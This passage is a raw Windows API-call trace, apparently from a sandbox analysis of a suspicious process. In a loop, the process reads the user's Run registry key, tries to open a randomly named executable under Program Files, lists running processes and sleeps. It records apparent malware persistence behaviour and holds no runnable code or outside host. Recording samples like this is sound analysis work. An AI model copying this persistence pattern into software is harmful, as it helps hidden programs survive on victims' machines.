NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.344] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.344] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0246.344] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0246.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0246.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0246.428] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0246.436] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0246.436] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0246.437] NtClose (Handle=0x14c) returned 0x0 [0246.437] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.437] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.437] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0246.437] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.437] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.437] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0246.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0246.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0246.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0246.551] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0246.562] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0246.563] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0246.563] NtClose (Handle=0x14c) returned 0x0 [0246.563] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.563] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.563] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0246.563] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.563] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.563] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0246.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0246.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0246.712] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0246.712] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0246.717] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0246.717] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0246.718] NtClose (Handle=0x14c) returned 0x0 [0246.718] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.718] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.718] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0246.718] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.718] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.718] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0246.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0246.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0246.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0246.845] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0246.866] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0246.866] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0246.866] NtClose (Handle=0x14c) returned 0x0 [0246.866] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.867] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.867] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0246.867] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.867] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.867] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0246.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0246.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0246.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0246.966] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0246.967] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0246.967] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0246.967] NtClose (Handle=0x14c) returned 0x0 [0246.967] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.967] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.967] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0246.968] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.968] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.968] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0246.968] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0246.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0247.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0247.070] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0247.076] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0247.076] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0247.076] NtClose (Handle=0x14c) returned 0x0 [0247.076] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.076] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0247.076] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0247.076] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.077] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0247.077] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0247.077] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0247.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0247.156] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0247.156] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0247.170] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0247.170] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0247.170] NtClose (Handle=0x14c) returned 0x0 [0247.170] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.170] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0247.171] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0247.171] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.171] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0247.171] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0247.171] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0247.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0247.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0247.262] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0247.264] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0247.264] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, 